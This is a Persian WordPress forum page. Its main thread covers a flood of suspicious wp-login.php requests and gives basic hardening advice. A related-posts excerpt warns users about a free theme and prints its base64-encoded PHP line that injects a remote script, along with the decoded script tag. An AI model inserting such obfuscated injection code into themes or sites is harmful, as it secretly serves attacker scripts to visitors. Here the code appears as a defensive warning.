• اطلاعیه ها

    • Saeed Fard

      حمایت وردپرس پارسی از همایش آینده وب و موبایل   19/04/74

        چهارم و پنجم اسفند ماه 1395، همایش آیندهٔ وب و موبایل ایران با حمایت سازمان فناوری اطلاعات در مرکز همایش‌های شهید قندی برگزار خواهد شد. این همایش یک رویداد ۲ روزه است که در آن پیشتازان صنعت وب و موبایل از تکنولوژی‌های روز دنیا در این حوزه‌ها سخن می‌گویند به طوری که این همایش پنجره‌ای به چشم‌انداز آینده‌ٔ وب و موبایل در جهان، و همچنین راهنمایی برای تصمیم‌گیران، تصمیم‌سازان و متخصصان ایرانی است.   فرصت‌هایی که FOWM#  برای شما خلق خواهد کرد: آشنایی با تکنولوژی‌های آینده‌ساز وب و موبایل شرکت در مباحث چالشی درباره وب و موبایل ارتباط و شبکه‌سازی با “قله‌های وب و موبایل” موقعیت‌های کاری، هم‌تیمی‌های جدید دریافت گواهی شرکت در همایش دو روز به‌یادماندنی سرشار از شگفتی   شرکت‌کنندگان در این همایش ضمن آشنایی با فناوری‌های آینده‌ساز وب و موبایل، شرکت در مباحث چالشی و ارتباط با بزرگان وب و موبایل ایران، می‌توانند موقعیت‌های کاری و هم‌تیمی‌های جدید برای کسب‌وکار خود بیابند. این همایش برای طراحان و توسعه‌دهندگان وب‌سایت و موبایل، مدیران ارشد سازمان‌ها، صاحبان کسب‌وکارهای کوچک و متوسط، دانشجویان و علاقه‌مندان دارای نکات آموزشی و جذاب خواهد بود.   مجید علوی‌زاده، دبیر همایش آیندهٔ وب و موبایل که سابقه اجرای چند همایش و سمینار مرتبط را دارد، اعلام کرد: جمعی از بهترین‌ها و پیشروان این دو حوزه در ایران با ارائه‌های تخصصی خود، چشم‌انداز آینده این صنعت‌ها را به شرکت‌کنندگان عرضه خواهند کرد.   در هر یک از روزهای برگزاری همایش، یک پنل تخصصی در مورد یکی از موضوع‌های مهم این حوزه نیز برگزار خواهد شد و دست‌اندرکاران به بحث و تبادل نظر خواهند پرداخت و در پایان، به شرکت‌کنندگان گواهی حضور در همایش اعطا خواهد شد.   ثبت نام در مهمترین رویداد صنعت وب و موبایل ایران تا پایان بهمن ماه ۹۵ امکان پذیر خواهد بود، برای ثبت نام و یا کسب اطلاعات بیشتر در خصوص این رویداد و آشنایی با موضوعات و سخنرانان به آدرس http://conf.wsschool.org/fowm مراجعه نمایید.   کاربران وردپرس پارسی می‌توانند با استفاده از کد wp-parsi از مبلغ ۴۰ هزار تومان تخفیف در ثبت نام برخوردار شوند.
ARS

ورودهای مشکوک به wp-login.php

10 پست در این موضوع قرار دارد

درود

دوستان از دیروز هرموقع آخرین بازدیدکنندگان رو تو افزونه ی آمار نگاه میکنم یه چندتا ورودی با آیپی های مختلف به آدرس wp-login.php وجود داره!!!

یعنی در تلاش برای هک کردن سایت ما هستند یا...!؟؟؟

نمی دونم لازمه کار خاصی انجام بدم؟؟

البته کلیه پیشنهادهای امنیتی رو انجام دادم!!

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

ای پی خودتون متغیر (دینامیک) نیست ؟

رنج و محدوده ای پی ها نزدیک به همه ؟

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

ipها رو بررسی کنید مربوط به رباتها نباشد

در سایت لینکی به این صفحه دارید؟

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

ای پی خودتون متغیر (دینامیک) نیست ؟

رنج و محدوده ای پی ها نزدیک به همه ؟

آیپی خودم متغیره ولی میدونم آیپی خودم نیست!

رنج آیپی ها هم نزدیک به هم نیست یه چندتاش:

209.40.202.68

178.208.91.196

50.97.141.98

ipها رو بررسی کنید مربوط به رباتها نباشد

در سایت لینکی به این صفحه دارید؟

در سایت هیچ لینکی به این صفحه نیست!

آیپی ها هم فک نکنم برای رباط ها باشن!!

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

دوستان هنوز مشکل برطرف نشده!

نظر خاصی ندارید!!!؟

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

احتمالا مربوط به رباتها است

در سایت زیر ip را بررسی کنید

http://ip-lookup.net

توصیه های امنیتی را بکار ببرید و نگران این چیزا نباشید

چندان مهم نیست

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

این نوع حمله های سرگردون نرم افزاری هستند (اغلب) اصولا بعیده یک هکر تلاش کنه از طریق صفحه لاگ این وردپرس یک سایت معمولی رو که قاعدتا چیزی برای سرقت نداره هک کنه

برای هک وردپرس منفذ هایی رو پیدا می کنند که لاگ این رو بشه باهاش دور زد و وارد ادمین شد اون هم با اهداف مشخص

نام کاربری ادمین را admin یا administraror نگذارید چک کنید از تنظیمات وردپرس اجازه ثبت نام اگر باز بود ثبت نام را ببندید حتی اگر سایت عضو پذیری هستید یک روز حداقل جلو ثبت نام را ببندید و رمزتون رو در 24 ساعت آینده دو سه بار تغییر بدید و در رمزهاتون از کارکترهای !@#$%^&*~ استفاده کنید و اگر رمزتون رو می خواهید روی سیستمتون ذخیره کنید مثلا از آخر به اول بنویسید یا به همه عددها یک عدد مشخص اضافه کنید که فقط خودتون سردربیارید

معمولا نرم افزارهای فرم شناس تبلیغاتی این تلاش ها را برای راهیابی به مکانهایی که امکان عضویت داره برای ارسال اسپم هاشون می کنند

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

دوستان پیشنهادی برای جلوگیری از این ورودی ها ندارند؟؟؟

از دیروز تا حالا بیش از 1000 تا ورودی به wp-login.php داشتم!!!!

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

اگر کاربر دیگه ایی بجز خودتون ندارید موقتا فایل رو تغییر نام بدید ببینید چه اتفاقی میوفته

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

خوب یک پیشنهاد دارم.

شما یک فرم بسازید با ورودیهایی که شبیه فرم لاگین هست (یوزر) و اطلاعات ورودی توی فرم رو به جای دیگه ای بفرستید. یه نمونه فرم بود که اطلاعات ورودی فرم توی یک فایل روی سرور ثبت میشد. اینجوری در واقع یک فیک پیج ساختید و میتونید ببینید این ورودیها چه چیزهایی رو توی فرم ثبت میکنند.

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط m2ostafa
      سلام من  سایتم ۲ بار  هک شده بود بخاطر همین یسری فایل های مخرب توش دیده بودم و سعی کردم پاک کنم.یبار کامل سایت رفت پایین و مجبور به ریکاوری شدیم.الان سایت بالاست اما خیلی هنوز فایل های مخرب توش تکثیر میشه اونقدر که دیگه الان هاست ۱ گیگم پر شده در صورتی که ۳۰۰ مگ دیتا بیشتر ندارم.کسی می تونه کمکم کنه بگه چجوری فایل هارو پیدا کنم؟
    • توسط loveali
      با سلام
      یه چند وقتیه که وقتی کسی برای اولین بار (از طریق موتور جست و جو -گوگل) سایت رو باز می کنه پیغام زیر رو که براتون اتچ کردم نمایش می ده
      dr-narmaki.com
      یه چند تا کد مشکوک هم دیدم تو فایل header که پاک کردم
      اول فک می کردم سرویس cloudflade که دیدم تو فروم های خارجی این کار رو می کنن که ادمین سایت رو گول بزنن و می گفتن سایتشون hijacking مرورگر شده
      به نظرتون چیکار می تونم بکنم؟
      باتشکر

    • توسط m2ostafa
      سلام دوستان از دیروز سایتم بالا نمیاد بدون اینکه به چیزی دست بزنم و تغییراتی بدم
      http://axaco.ir
      گوگل وبمستر تولز از چند روز  پیش بم پیام داده بود که فردی تغییراتی داده در هاست شما و بازدید شما غیر واقعی شده
      و
      امروزم متوجه فایل هایی شدم کاملا جدیده و بی ربط شبیه سایت های پ ورن ممنون میشم راهنماییم کنید باید چیکار کنم چون کلا سایتم بالا نمیاد و رتبه گوگلم هم دارم از دست می دم
      اینم ایمیل گوگل
      To: Webmaster of http://axaco.ir/,
      Google has detected that your site has been hacked by a third party who created malicious content on some of your pages. This critical issue utilizes your site’s reputation to show potential visitors unexpected or harmful content on your site or in search results. It also lowers the quality of results for Google Search users. Therefore, we have applied a manual action to your site that will warn users of hacked content when your site appears in search results. To remove this warning, clean up the hacked content, and file a reconsideration request. After we determine that your site no longer has hacked content, we will remove this manual action.
      Following are one or more example URLs where we found pages that have been compromised. Review them to gain a better sense of where this hacked content appears. The list is not exhaustive.
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/-hello-pai.html
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/fix-Kalyan-ma.html
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/jam-buka-prsu.html